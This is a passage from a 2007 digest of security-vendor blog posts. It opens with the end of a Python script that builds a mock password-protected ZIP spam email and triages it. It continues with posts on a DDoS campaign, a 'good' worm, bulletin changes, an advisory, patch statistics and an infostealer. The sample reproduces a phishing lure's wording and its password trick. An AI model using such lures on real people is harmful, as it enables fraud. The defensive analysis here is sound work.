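        "suspicious": bool(members) and hint is not None,
    }


def build_sample_message(body_text: str) -> bytes:
    """Constructed sample resembling the spam run: Italian body, ZIP attachment."""
    msg = EmailMessage()
    msg["From"] = "avvisi@example.invalid"  # placeholder sender, not the real lure
    msg["To"] = "utente@example.invalid"
    msg["Subject"] = "Avviso: file mp3 pirata rilevati"
    msg.set_content(body_text)
    msg.add_attachment(make_encrypted_zip(b"rapporto.exe", b"\x00" * 64),
                       maintype="application", subtype="zip", filename="rapporto.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage_message(build_sample_message("Il rapporto e' in allegato. Password: polizia2007\n")))
```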

You would think most folks would be wary of opening a password protected attachment and inputting the password to execute the payload. But with millions of newbie users using the internet, morbid curiosity will always get the better of someone who is receiving such a type of email for the first time.

Detection for this threat is already available in the beta DATs and will be released in today’s 5033 DATs.

This entry was posted on Thursday, May 17th, 2007 at 4:35 am and is filed under Malware Research, Spam and Phishing.

Source: Computer Security Research - McAfee Avert Labs Blog

 

DDoS Attacks on Finnish Sites
Posted by Sean @ 12:01 GMT


Screenshot of Teamelite's Multispam DDoS tool

There have been several DDoS attacks targeting Finnish websites this week. Targets have included the Finnish Broadcasting Company and the largest newswire in Finland. Several weblog readers have been asking for our take on this.

The attacks have been keeping us quite busy. Since we're working with the authorities, any insider details will have to wait until a later date as investigations are ongoing. So that's one of the reasons why little is mentioned here.

For general details English readers can read more about what's been going on from HS.fi, STT and YLE: 1, 2, 3.

Source: F-Secure : News from the Lab

 

An experiment in using sponsored ads for malware

Thursday May 17, 2007 at 2:25 am CST
Posted by Allysa Myers


After last month’s excitement over the sponsored ads on Google being used to steal bank passwords, a security researcher named Didier Stevens discussed an experiment he’d been running to see how much traffic he could get using the same sort of tactic, with a reverse social-engineering twist: he set up an ad that promised to infect your computer upon clicking the link.

Experiment Image

In this case, the site was actually harmless, but over 400 people did in fact click the link. My guess is that there was probably a lot of curiosity about what an actual virus infection “looks” like. I also wonder what percentage were clicks from people using browsers or OSes they consider to be immune to such things - I suspect a notable number. Something akin to people driving less cautiously around bicyclists who wear helmets, since they consider those bikers to be better protected.

Source: Computer Security Research - McAfee Avert Labs Blog

 

When Good Intentions Go Bad

The use of self-propagating programs for legitimate purposes is one of those ideas that just refuses to die.

In 1978, researchers at Xerox Palo Alto Research Center (PARC) created worms that performed tasks including system monitoring and wake-up calls. However, in one case, the Xerox PARC ‘good’ worms that were supposed to run on a small set of machines instead replicated uncontrollably across the network and started crashing machines. Fortunately, the Xerox PARC researchers had built an independent termination mechanism into the worm that enabled them to kill all copies of the worm on the network. Unfortunately, they still had 100 dead machines.

Since then, others have proposed using ‘good’ worms for purposes such as compressing all files on a network, battling against ‘evil’ worms, patching vulnerabilities, and looking for ways around Internet censorship systems.

Unfortunately, people occasionally put these theories into practice.

Recently, we added detection for W32.Uisgon.A. The author of W32.Uisgon.A appears to have been a computer science student who wanted to collect samples of viruses that were being brought into his college by USB sticks.

So he wrote a program that copies suspected virus samples to a Windows share and a ‘good’ worm to propagate his program. The worm copies itself to network shares and USB sticks and runs the sample collector from a remote Windows share.

Eventually, he intended to terminate the worm by replacing the sample collector on the Windows share with a fixtool.

However, his design resulted in the worm infecting machines outside his university and well beyond his control. In particular, USB sticks weren't just plugged into computers within his university network, but into computers outside the university as well, causing his worm to spread uncontrollably. Once the worm began spreading outside the university, he had no way to terminate those copies, as he had no way of accessing the machines.

The end result is a ‘good’ worm that is infecting computer networks in-the-wild and is no better than the ‘bad’ worms it was supposed to catch.

The student has written a long apology about his mistake. Partially translated from Chinese, he wrote:
"I created it only to help teachers clean up viruses and perform research... I was unable to control its self-destruction, and it has brought trouble for many people and has not been a good influence, for this I am deeply ashamed of myself. I hope everybody can forgive my error!"

Unfortunately, his apology is too late, as the worm now has a life of its own. Debate has gone on for a number of years about 'good' worms, but Symantec considers that term to be an oxymoron. A worm is a worm, and by its nature of self-replication we consider it malicious. This student didn't need self-replication; if he had the authority to run his code on all those machines, he could have installed his file-gathering program on each machine and achieved the desired result.

Instead, he just added one more worm into the world, the exact problem he was trying to solve.

Posted by Paul Mangan on May 16, 2007 05:55 PM

Source: Symantec Security Response Weblog: When Good Intentions Go Bad

 

ANS and Security Bulletin Updates

Hello everyone,

This is Mark Miller again to let you know about some additional changes we are making this month. In April, we announced changes to our blog site. This month we are announcing changes to our Advanced Notification Service (ANS) as well as some changes we are planning to make to the format of our security bulletins in June.

ANS changes:

As you know, the Thursday before Tuesday’s normal security update release, we send out an advanced notification letting you know what platforms are going to be impacted by the security updates and the maximum severity rating. The information is currently grouped and rolled up by platform (Windows, Office, etc.). This was implemented based on customer feedback that more time and information was needed to plan for testing and deployment. We’ve received positive feedback on the ANS, but customers have also told us that additional information would be even more helpful. Based on that, we are incorporating additional detail about the upcoming security updates. We plan to implement this change with June’s ANS release on Thursday, June 7.

The new ANS is essentially a subset of the monthly bulletin summary we publish the second Tuesday of each month. As such, the ANS will now be published at the same URL used for that month's security bulletin summary page (example below). For those not familiar with the monthly bulletin summary, it is a high-level overview of the bulletins released for a given month that includes a list of bulletins, severity rating, impact, affected software, download locations for the updates, general deployment information and a single list of acknowledgements thanking those who have practiced responsible disclosure in reporting the vulnerabilities the bulletins address. Moving forward, the ANS subset will contain the following for each bulletin, rather than being grouped by platform only:

· Maximum Severity Rating

· Impact of Vulnerability

· Detection information

· Affected Software

Once the security bulletins are released on the second Tuesday of the month, the bulletin summary page will be updated with complete details. For reference, the bulletin summary for May can be found here: http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx.

The old location of the ANS will now become a simple landing page describing the service, and the monthly bulletin summary page will serve as the ANS. For June, the ANS will be located here when it's published on the 7th at 10:00 AM Pacific time: http://www.microsoft.com/technet/security/Bulletin/ms07-jun.mspx

As always, you can subscribe to the ANS and other alerts here: http://www.microsoft.com/technet/security/bulletin/notify.mspx.

Security Bulletin Design Changes:

We’ve also spent a lot of time talking to customers about the layout of our security bulletins and how we can improve them. Customers very clearly pointed out that they were satisfied with the level of technical detail in the bulletins but needed to be able to more quickly determine the severity of the bulletin and its applicability to their environment. With that in mind, we set out to accomplish the following goals:

· Move all applicable decision making information to the top of the page

· Create a table of affected products (instead of a list) with links to the download location of the updates

· Change the section titles to be more representative of the content under them

· Re-arrange content to areas that make them more intuitive to find

· Reduce some of the repetitive content in the bulletin

Rather than try to fully describe the changes to the bulletin format, we have provided a sample of an actual bulletin (MS07-016 Cumulative Security Update for Internet Explorer (928090)) for you to preview:

http://www.microsoft.com/technet/security/bulletin/ms07-016-example-of-new-layout.mspx

We hope that these changes make your decision making process more efficient. We will continue to listen to your feedback and implement additional changes as needed.

Thanks! We appreciate all the feedback!

*This posting is provided "AS IS" with no warranties, and confers no rights.*


Source: The Microsoft Security Response Center (MSRC) : ANS and Security Bulletin Updates

 

Symantec Discovery XferWan.exe Packet Parsing Buffer Overflows

Secunia Advisory:
SA24281

Release Date:
2007-05-16

Critical:
Moderately critical

Impact:
System access

Where:
From local network

Solution Status:
Unpatched

Software:
Symantec Discovery 6.x

CVE reference:
CVE-2007-1173 (Secunia mirror)

Description:
Secunia Research has discovered two vulnerabilities in Symantec Discovery, which can be exploited by malicious people to compromise a vulnerable system.

For more information:
SA24090

The vulnerabilities are confirmed in version 6.5. Other versions may also be affected.

Solution:
The vendor is working on a patch, which will be available soon.

Only allow connections from trusted clients.

Disable the CentennialIPTransferServer service.

Provided and/or discovered by:
Dyon Balding, Secunia Research.

Original Advisory:
Secunia Research:
http://secunia.com/secunia_research/2007-42/

Other References:
SA24090:
http://secunia.com/advisories/24090/

Source: Symantec Discovery XferWan.exe Packet Parsing Buffer Overflows - Advisories - Secunia

 

28% of all detected applications are insecure

13:36 CET on the 16th May 2007. Entry written by Jakob Balle.

Since its release in December of last year, the free, online Secunia Software Inspector has conducted over 350,000 inspections. These inspections have identified 4.9 million popular applications (as listed here), and out of those, 1.4 million applications were found to be lacking critical security patches from the vendors.

While most people are aware of the need to update their anti-virus patterns and to raise their firewall shields, it appears that too many users either don't know that their systems are vulnerable to significant issues or that they simply don't want to spend the necessary time scouring for vulnerability information and the relevant vendor patches to properly address the issues.

This fact is further highlighted if we dig deeper into the figures behind the fact that 28% of all detected applications by the Software Inspector are vulnerable.

Comparing browsers and looking at Firefox, Opera and Internet Explorer, we found out that Firefox 2 is the least vulnerable, as only 5.19% of all Firefox 2 installations miss security updates, whereas 11.96% of all Opera 9.x installations miss security updates, and the numbers for IE6 and IE7 are 9.61% and 5.4% respectively. These numbers are not that alarming and show that users are fairly concerned about applying relevant updates for their browsers – which naturally is one of the most exposed applications.

But looking at media players such as Quicktime and WinAMP, the figures are more worrying: 26.96% of all WinAMP 5 installations miss important security updates and 33.14% of all Quicktime 7 installations are outdated.

Most people using Windows and Microsoft products are aware of the monthly “Patch Tuesday” routine that Microsoft has set up, which can explain why the patch level for MS products is relatively high. These numbers also indicate that many people using Firefox and Opera are concerned about security and remember to keep their products updated.

But when it comes to other applications that don't immediately seem that exposed, people tend to wait for an extended period of time before patching.

This constitutes a significant problem because many of those applications, like WinAMP and Quicktime, are readily used whenever users encounter media files of various kinds. Most people wouldn't hesitate to open an .mpg, .jpg, .mov, or .mp3 file from any source if it seems the least bit interesting and relevant. It's easy to embed a movie in your homepage, for example, and all it takes is one unpatched Quicktime vulnerability and a provocative video title to compromise a lot of visitors.

Comparing this with the figures we have for corporate environments, there isn't much of a difference, though the vulnerable applications tend to be more business-like in nature, exploiting flaws in enterprise software and devices rather than media players. However, the overall picture is the same: the operating systems, browsers, and Microsoft applications in general appear to be updated fairly regularly. But all other applications seem to be forgotten, or receive too low a priority given the severity of the issues, and the fact is that exploits are available for a great deal of them. Not to mention that corporations have much more to lose than just their credit card details; there's client lists, design blueprints, employee information, and more at stake.

The need for tools that provide proper and exact information about which security updates are missing, on both private PCs and corporate networks, seems to be critical.

For half a year the Secunia Software Inspector has been available free of charge, with the purpose of highlighting the most important and common security issues in the most common user-end applications. This approach is fine for private individuals with one or two PCs, but for network administrators with multiple systems it isn't feasible.

To help companies Secunia has developed a new tool called the Secunia Network Software Inspector (NSI). For the last 3 weeks this has been available in a public BETA for corporate users. A total of more than 1,600 IT administrators from all over the world, from small and medium businesses to global corporations, have tested it.

The Secunia NSI can be deployed from a central server and configured to inspect multiple machines in a network. It is also capable of identifying more than 4,000 unique applications, down to the specific version number and patch level, as well as which applications are missing security updates and which ones have reached end-of-life. The feedback of the beta testing has been overwhelmingly positive, and we are grateful to all the BETA testers who participated in this event.

The Secunia NSI is now available for corporate users in a full version. For more information please see:
http://secunia.com/network_software_inspector/

The Secunia Software Inspector is still available FREE of charge in an easy to use Java version. It is continuously updated with new signatures to identify the latest versions and missing patches for over 40 popular applications:
http://secunia.com/software_inspector/

Best regards,

Jakob Balle
IT Development Manager

Source: 28% of all detected applications are insecure - Blog - Secunia

 

Found Your Password on a Search Engine

Recently we found a new malware called Infostealer.Snifula.C. The main purpose of the malware is to steal confidential information from a compromised computer and send it to a certain web site. The author of the malware can obtain the information from the site and make money with it. To make matters worse, the web site has no access control and anyone can access the information there.


As I'm writing this, more than 300MB of logs are at the site, and we can see a huge collection of confidential information such as names, addresses, phone and credit card numbers, and login information for email, online banking, MySpace, or eBay. And all of this information can be accessed through search engines.


I think the Infostealer.Snifula.C author does not intend to release the stolen information to the public and this happened by accident. However, for victims, this is a nightmare. Anyone in the world can get your confidential information.
If you are infected with the malware, you should remove it and make sure that your accounts for both online and offline services are safe. Even if you are not infected, you may be surprised at what you can find out about yourself through a search engine!

Posted by Kaoru Hayashi on May 15, 2007 08:00 AM

Source: Symantec Security Response Weblog: Found Your Password on a Search Engine